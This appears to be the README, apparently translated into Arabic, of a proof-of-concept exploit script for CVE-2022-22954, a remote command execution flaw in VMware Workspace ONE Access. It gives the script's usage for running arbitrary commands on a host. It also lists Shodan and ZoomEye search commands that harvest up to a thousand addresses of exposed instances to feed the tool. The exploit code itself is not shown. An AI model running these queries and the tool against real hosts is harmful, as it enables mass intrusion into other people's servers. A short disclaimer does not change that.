
إثبات مفهوم لاستغلال CVE-2022-22954، وهي ثغرة تنفيذ الأوامر عن بُعد في VMware Workspace ONE Access عبر SSTI. يدعم الاستطلاع عبر Shodan وZoomeye، وقوائم الأهداف المستندة إلى الملفات، وتنفيذ الأوامر يدويًا.
VMware Workspace ONE Access و Identity Manager RCE عبر SSTI.
CVE-2022-22954 - PoC SSTI
الاستخدام:
CVE-2022-22954.py [-h] -m SET_MODE [-i IP] [-c CMD]
optional arguments:
-h, --help show this help message and exit
-m SET_MODE, --mode SET_MODE
Available modes: shodan | file | manual
-i IP, --ip IP Host IP
-c CMD, --cmd CMD Command string
هذا مجرد PoC. استخدمه على مسؤوليتك الخاصة وليس في بيئات الإنتاج أو البيئات الحقيقية. لا تسألني لماذا الكود بهذا الشكل أو إذا كان جيدًا أم سيئًا، لا يهمني. لست مبرمجًا رائعًا وكودي قبيح.
zoomeye search 'iconhash:-1250474341' -num 780 -filter=ip,port
zoomeye search 'banner:/SAAS/auth/login' -num 900 -filter=ip,port
shodan search "http.favicon.hash:-1250474341" --fields=ip_str,port --separator ":" --limit 1000 | grep ''
shodan search 'title:"Workspace ONE Access"' --fields=ip_str,port --separator ":" --limit 1000 | grep ''